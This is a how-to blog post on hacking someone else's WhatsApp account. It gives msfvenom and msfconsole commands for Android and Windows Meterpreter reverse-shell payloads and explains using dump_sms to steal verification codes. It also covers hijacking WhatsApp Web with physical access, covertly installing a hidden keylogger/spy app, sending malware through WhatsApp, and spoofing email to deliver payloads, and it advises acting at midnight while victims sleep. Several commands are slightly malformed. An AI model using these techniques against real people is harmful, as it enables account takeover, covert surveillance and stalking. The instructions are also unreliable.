So you want to learn or Hack someone’s WhatsApp account. Hacking WhatsApp account is not an easy. In Facebook hacking, you can guess the password and so many other ways like phishing, but in WhatsApp, there is No password :(.
You can find so many websites like hack WhatsApp online, hack within 2 minutes. These all are fake. Whatsapp have bug bounty program meaning if anyone found a bug in WhatsApp app. The company will maybe him money depending upon the risk of bug.
if you have any problem with these techniques let me know by comments, I will happy to help.
Note: I will help you understand WhatsApp hacking methods Not in hacking WhatsApp.
If a website can hack WhatsApp then why they will do free. if you still think it can be hacked quickly go to hell.
Also, read Kali Linux tutorial for beginners
For Hacking WhatsApp, you need to hack his/her phone. There are a couple of ways to hack the phone. Method that I post most of them will work on android phone only
By Hacking android phone
It is not a very difficult method you can do it. If you read this trick, carefully you can hack android without touching your victim phone :). Keep patience. I think Metasploit is the best way to Hack android phone. I already published an article How to hack an android phone with depth in this I will not go into very details.
In computer or laptop, I will advise you to install Kali Linux or parrot sec. Metasploit is pre-installed on both operating systems.
Metasploit can installed on android phone using termux. Here you can install termux on your android phone. After installing this, you have to install the Metasploit framework.
Termux or Kali Linux
Guys, please accept it mobile phones can’t become a computer. No doubt termux framework which is Awesome can be used, but I don’t know what the problem with me It did not work for me is. I know how to use Metasploit, but I did not receive any connection.
I check youtube videos they install apps on their own phone. LOL, I don’t want to make you fool, but you can try termux if you wish to.
I will use parrot sec for this you can use anyone like Kali Linux etc. Metasploit can also be installed on window operating system
creating the payload
msfvenom -p android/meterpreter/reverse_tcp LPORT=your local IP LPORT=4444 -o appname.apk
First I will do on my local network than on show you how to perform over the internet.
Here LHOST is my IP local IP address you can find using ifconfig command.
It will generate payload in /root directory (if you log in as root) with the name of appname.apk, install this app on your phone.
You need to listen a connection here are commands for this.
msfconsole -x “use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 192.168.43.60; run”
Here lhost is my local Ip address no need to set lport because it is already 4444.
Make sure android device and computer should be connected to the same network. I just turned on hotspot on from my phone then connect my pc.
Install the app on your phone open it you will get nothing on the computer you will get the meterpreter session. I have searched a lot, but you can see messages, contacts, files only.
- You can see message using dump_sms so it means you can get the WhatsApp verification code. using dump_contacts
- you can get all contact list message to anyone.
- Using files, you can copy Whatsapp media files.
Meterpreter session is like this. Type help to see what you can do on the target phone.
I have highlighted dump_sms which is used to get all SMS messages. TO browse files, you should know necessary Linux commands. Before hacking real device make sure you practice enough.
In your mobile phone Install parallel space( size: 1.72 MB) application from play store using this app and you can also use the dual account of any other app like hike, we chat, facebook, etc.
Here is process how to use parallel space open it and click on clone button after that select WhatsApp choose to Add to parallel space now it will make an icon of WhatsApp where you can use dual WhatsApp
Click on WhatsApp icon I think you know what to do next type victim it will send code then you can get the code using the dump_sms command.
Above command will copy a txt file in /root (user if you log in as root). Open new terminal and type ls
nano is text editor like notepad. It will open the file.
You see my Google verification code. Same way you can see WhatsApp verification code. I told you above you can get the contact list and WhatsApp media files learn Linux commands and do it yourself.
Bonus Tip: Meterpreter session will die after some time Here is solution to this problem
How to perform over the internet
For this, you need to port forward your router. If you are using mobile data then you can’t port forward you need Internet by broadband. Here is video how to port forward your router.
I don’t have a broadband connection right now But believe it works.
Bonus Tip: Always get WhatsApp verification code at midnight because people are sleeping at that Time. Make sure you hide app icon using the hide-app-icon command.
You will you install this app on victim phone or without touching his phone?
Recently I have post android hacking part 2: Install apps remotely. I have 2-3 ways to install apps without access phone like email spoofing which did not work on android mobile. But beef works on all devices.
if your victim is using web email like ([email protected]), then Use email spoofing. It is a technique to send emails from anyone address here is the screenshot.
But the biggest limitation of the email spoofing it does not work for Gmail service.
Using Whatsapp web
There is nothing to explain in this technique. You just need physical access to your victim phone. Open WhatsApp on his phone click on the menu at the top of the Right corner.
Tap on Whatsapp Web button. If you open it the first time, you will see a camera with tip open web.whatsapp.com. Sometime victim login to Whatsapp using his computer then there will be a logged in the device list.
I recommend chrome browser. Open a new tab and click on menu and tap on Desktop site. If you did not tick, you will not be able to see QR code.
Open web.whatsapp.com on your phone make sure tick Keep me signed in. It is important.
Scan QR code using your victim mobile number. After scanning code his/her account will be signed.
When you scan code successfully you will see something like this.
Next time you visit web.whatsapp.com, you will see logged in account.
The main limitation of this technique is that it will work until your victim has the working internet connection. If he/she turned the internet of, you would not be able to see his/her messages.
I will advise ask your, mutual friend, to call your victim on WhatsApp so you can read messages without any problem.
I hope it will help you.
Getting Whatsapp verification code
Another easy process but tough to get the code. I know you know how to do it. The main problem with this method is WhatsApp will not run on two devices simultaneously on two or more device. It is outdated technique What I think you should know about it.
Best thing of this is that sometimes people will lock there Whatsapp and phone with a pattern or anything else. In that case, you can use this trick because you can read Whatsapp message without the opening lock screen. Here is the screenshot of this.
Hacking android phone is the same thing But using this you can’t media files and contacts.
Using keylogger app
I think this is the best way to hack Whatsapp. The keylogger app is an app which record every keyword typed by the user. So not only WhatsApp you get enough if you have successfully installed the keylogger app.
There are many keyloggers apps available, but I think hoverwatch is the best because
It gives you a free trial for three days (without the credit card ).
Here are steps
This app is not available in Google play store. You have to download from official site. This is best free spy software from all tested apps. First of all, it is not a keyboard app it is a spy app. You will not need any physical access to see typed keystrokes again and again.
Just Install and receive log files online. There is the only one limitation in this app that it will give you free trial version up to 3 days. Therefore, you can use hoverwatch free for only three days. Paid Plans are starting from $8.33/month for a single device
How to enable hoverwatch
- Open hoverwatch official site, type your email and password and click on “Sign up Free” Button.
- It will take you to https://i.hoverwatch.com/app/index.html#add-device URL you can see a Download button click on it [make sure it is under android tab as shown in the screenshot]
- After downloading Install it in which phone you want to install. Don’t ask in comments how to install an app.
- After Installing it, open the app. When you open this app, it will ask you about I am going to use this software to monitor. I recommend you to choosing my own device and make sure Hide Hoverwatch Icon and click on the Ok button
- on next page agree With Legal Terms tap on I ACCEPT button then It will ask for “Activate device administrator” click on Activate button
- On next page, it will ask your email & password so enter email and password that you made in the first step
- Done now you are ready you can view logs on the hoverwatch website. Sign in your account, and you can see all recorded keystroke.
By Sending a malicious virus on WhatsApp
Did you think this is something that I discovered but believe me I just try first and it works :D. Before sending any malicious photo early, I will tell you how to send malicious virus app.
I’m going to use Metasploit, but antivirus will catch it is malware. (don’t worry I have solution to this problem ) but just for the demo, I will send Metasploit payload by disabling antivirus.
How to create payload using Metasploit
msfvenom -p windows/meterpreter/reverse_tcp/ LHOST=your local IP address -f exe -o /root/thename.exe.
ifconfig command will show your IP address. if you want to understand your code then visit Metasploit training for beginners
Before sending this run this command to listen to the connection.
msfconsole -x ” use exploit/multi/handler/ set payload windows/meterpreter/reverse_tcp set LHOST your local Ip address. “
To send this file open web.whatsapp.com on your computer.
I will send this payload to Sandeep It does not matter click on attack icon and select photos and gallery.
It will open a file manager dialog box. At the bottom change your file type to all.
Select your virus file and click on open. The data will start uploading.
When our target download this using WhatsApp click to open it, he/she will get nothing
but you will get the meterpreter session. using keyscan_start, stop dump you can make your payload work like a keylogger (but you send it using Whatsapp)
Of course, the antivirus will detect it try to remove. The perfect solution of this is code your virus. It is not too complicated. You just need some programming experience.
If you still have no idea how to create a virus then let me know by comments, I will create a new post, or you can buy 63 courses at $49 (it include a course where you learn how to code own malicious application.)
You have watched a lot of videos hack WhatsApp using ss7. You have also search how to hack WhatsApp using ss7. If you don’t know what ss7 is, then watch this video.
I hope you will understand what ss7(system signal 7) is. Believe you can’t do. For this, you need networking knowledge and a physical hub. But I thought you should know about it. if you want to understand it deeply then watch this video (it is in the Hindi language).
Extracting Whatsapp database
Whatsapp stores all message in a database it will be on your phone. But this WhatsApp database is locked with a key. To get key, you have to root your phone. Using key, you can unlock database then read all messages.
The best thing about this no matter if you target delete WhatsApp message. They are present in the database.
How to root your phone.
It depends on your model number etc. search on google how to root model name.
WhatsApp database location
Don’t try to access without root.
Watch this video to know to decrypt data.